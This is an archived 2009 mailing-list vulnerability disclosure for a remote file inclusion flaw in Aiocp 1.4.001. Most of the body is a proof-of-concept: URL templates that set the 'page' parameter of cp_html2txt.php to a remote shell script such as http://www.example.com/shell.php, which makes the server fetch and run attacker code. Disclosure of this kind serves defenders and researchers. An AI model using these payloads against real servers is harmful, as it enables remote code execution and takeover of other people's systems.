Remote File Inclusion in aiocp
- From: hadikiamarsi@xxxxxxxxxxx
- Date: 27 Jul 2009 05:58:37 -0000
###########################################
#
# Aiocp 1.4.001 Remote File Inclusion vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download
#
###########################################
PoC :
http://[target]/[path]/public/code/cp_html2txt.php?page=[SHELL]
example :
http://localhost/root/public/code/cp_html2txt.php?page=http://www.example.com/shell.php
local Example :
http://localhost/root/public/code/cp_html2txt.php?page=http://localhost/shell.php
- Prev by Date: Re: Cross-Site Scripting vulnerability in Mozilla, Firefox and Chrome
- Next by Date: rPSA-2009-0111-1 kernel
- Previous by thread: PHP filesystem attack vectors - Take Two
- Next by thread: rPSA-2009-0111-1 kernel
- Index(es):
